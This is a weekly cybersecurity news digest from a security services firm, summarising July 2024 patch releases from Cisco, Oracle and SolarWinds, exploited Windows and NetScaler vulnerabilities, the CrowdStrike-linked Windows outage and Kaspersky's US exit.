Huge Crowdstrike and Microsoft outage, attacks on Windows and NetScaler and 240 Oracle patches... all in this week's security news...
Welcome to this week’s Security News. We’ve collated the best articles from the around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly.
Vulnerabilities and Patches
Cisco Releases Security Advisories for Multiple Products
Cisco has released advisories covering multiple products including two critical vulnerabilities, three high, and four medium severities. The two critical vulnerabilities are known as CVE-2024-20419 and CVE-2024-20401.
- CVE-2024-20419 affects Cisco Smart software Manager (SSM) On-Prem and has a CVSSv3 score of 10 and could allow an unauthenticated, remote attacker to change the password of any user, including administrative users.
- CVE-2024-20401 affects Cisco Secure Email Gateway and has a CVSSv3 score of 9.8 and could allow an unauthenticated, remote attacker to overwrite arbitrary files on the underlying operating system (OS). This could allow an attacker to then add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial-of-service (DoS).
Additionally, two previous advisories regarding the regreSSHion (OpenSSH server RCE) vulnerability and the Blast-RADIUS (RADIUS protocol spoofing) vulnerability were updated.
Oracle Patches 240 Vulnerabilities With July 2024 CPU
Oracle on Tuesday announced 386 new security patches as part of its July 2024 Critical Patch Update (CPU), including over 260 for unauthenticated, remotely exploitable vulnerabilities. Financial Services Applications also received a hefty round of security patches, at 60, including 44 for unauthenticated, remotely exploitable bugs. Next in line is Fusion Middleware, with 41 fixes, 32 of which address issues that can be exploited by remote, unauthenticated attackers. Oracle released 37 security patches for MySQL, including 11 for vulnerabilities that are remotely exploitable without authentication, 20 fixes for Communications Applications (14 for unauthenticated, remotely exploitable flaws), and 17 patches for Analytics (12 for remotely exploitable, unauthenticated bugs). Security patches were also released for Siebel CRM (12 fixes – 11 for issues that are remotely exploitable without authentication), PeopleSoft (11 – 3), Insurance Applications (10 – 7), E-Business Suite (10 – 2), JD Edwards (8 – 6), Database Server (8 – 3), Commerce (7 – 7), Java SE (7 – 7), and Supply Chain (7 – 5). Other Oracle products that received patches include Application Express, Essbase, GoldenGate, NoSQL Database, REST Data Services, TimesTen In-Memory Database, Construction and Engineering, Enterprise Manager, HealthCare Applications, Hyperion, Retail Applications, Systems, Utilities Applications, and Virtualization.
SolarWinds Patches 11 Critical Flaws in Access Rights Manager Software
SolarWinds has addressed a set of critical security flaws impacting its Access Rights Manager (ARM) software that could be exploited to access sensitive information or execute arbitrary code.
Of the 11 vulnerabilities, seven are rated Critical in severity and carry a CVSS score of 9.6 out of 10.0. The remaining four weaknesses have been rated High in severity, with each of them having a CVSS score of 7.6.
The most severe of the flaws are listed below –
- CVE-2024-23472 – SolarWinds ARM Directory Traversal Arbitrary File Deletion and Information Disclosure Vulnerability
- CVE-2024-28074 – SolarWinds ARM Internal Deserialization Remote Code Execution Vulnerability
- CVE-2024-23469 – Solarwinds ARM Exposed Dangerous Method Remote Code Execution Vulnerability
- CVE-2024-23475 – Solarwinds ARM Traversal and Information Disclosure Vulnerability
- CVE-2024-23467 – Solarwinds ARM Traversal Remote Code Execution Vulnerability
- CVE-2024-23466 – Solarwinds ARM Directory Traversal Remote Code Execution Vulnerability
- CVE-2024-23471 – Solarwinds ARM CreateFile Directory Traversal Remote Code Execution Vulnerability
Cyber Attacks
APT Exploits Windows Zero-Day to Execute Code via Disabled Internet Explorer
An advanced persistent threat (APT) actor known as Void Banshee has exploited a recent Windows zero-day to execute code through the disabled Internet Explorer, Trend Micro explains. The vulnerability, tracked as CVE-2024-38112 (CVSS score of 7.5), was addressed with the July 2024 Patch Tuesday updates, roughly two months after Trend Micro discovered it in the wild and reported it to Microsoft. Void Banshee, a threat actor targeting entities in North America, Europe, and South Asia for information theft and financial gain, exploited CVE-2024-38112 as a zero-day to infect victims with the Atlantida stealer, a malware family discovered in January 2024. As part of the observed attacks, the APT leveraged internet shortcut (URL) files to abuse the MSHTML (MIME encapsulation of aggregate HTML documents) protocol handler and x-usc directives and execute code directly through Windows’ disabled Internet Explorer (IE).
Exploited Unauthenticated RCE Vulnerability CVE-2023-6548 in Citrix NetScaler ADC and NetScaler Gateway
The NHS England National Cyber Security Operations Centre (CSOC) is aware of intelligence provided by CrowdStrike that contrary to Citrix’s initial disclosure, the vulnerability known as CVE-2023-6548 does not require user privileges for exploitation. NHS England National CSOC now assesses CVE-2023-6548 as a critical vulnerability that can allow a remote, unauthenticated attacker to execute remote code on a vulnerable NetScaler Gateway or NetScaler ADC device. CVE-2023-6548 has two different CVSSv3 scores attributed to it. The NIST National Vulnerability Database (NVD) has classified it as having a score of 8.8, while Citrix rates the vulnerability at 5.5. The weakness is Improper Control of Generation of Code (‘Code Injection’) in NetScaler ADC and NetScaler Gateway and could allow a remote, unauthenticated attacker with access to the management interface to execute arbitrary code. Due to the change of severity of this vulnerability, affected organisations must update to the most recent version available, which for July 2024 include:
- 14.1 build 25.56
- 13.1 build 53.24
- 13.0 build 92.31
In Other News...
Microsoft IT outage linked to cyber security firm Crowdstrike hits airlines, railways, NHS, and media outlets globally
A CrowdStrike update is breaking computers running Windows, causing them to crash and display the Blue Screen of Death. Companies around the world have been unable to reboot, according to reports. Businesses including banks, airlines, railways, telecommunications companies, TV and radio broadcasters, and supermarkets have been taken offline after blue screen of death error screens were seen on Windows workstations across the globe. Britain’s biggest train company has warned passengers to expect disruption due to “widespread IT issues”. Govia Thameslink Railway – parent company of Southern, Thameslink, Gatwick Express and Great Northern – issued an alert on its social media channels. The NHS booking system used by doctors in England is offline, medical officials said on X. Firms affected by the outage include Sky News, which has been unable to broadcast. Sky News in the UK reported being off air this morning, with Sky News sports presenter Jacquie Beltrao posting on X: “We’re obviously not on air – we’re trying.” Sky News is still down, according to a message on its website. The London Stock Exchange is also facing technical issues.
Kaspersky Exits U.S. Market Following Commerce Department Ban
Russian security vendor Kaspersky has said it’s exiting the U.S. market nearly a month after the Commerce Department announced a ban on the sale of its software in the country citing a national security risk. News of the closure was first reported by journalist Kim Zetter. The company is expected to wind down its U.S. operations on July 20, 2024, the same day the ban comes into effect. It’s also expected to lay off less than 50 employees in the U.S. “The company has carefully examined and evaluated the impact of the U.S. legal requirements and made this sad and difficult decision as business opportunities in the country are no longer viable,” the company said in a statement. In late June 2024, the Commerce Department said it was enforcing a ban after what it said was an “extremely thorough investigation.” The company was also added to the Entity List, preventing U.S. enterprises from conducting business with it.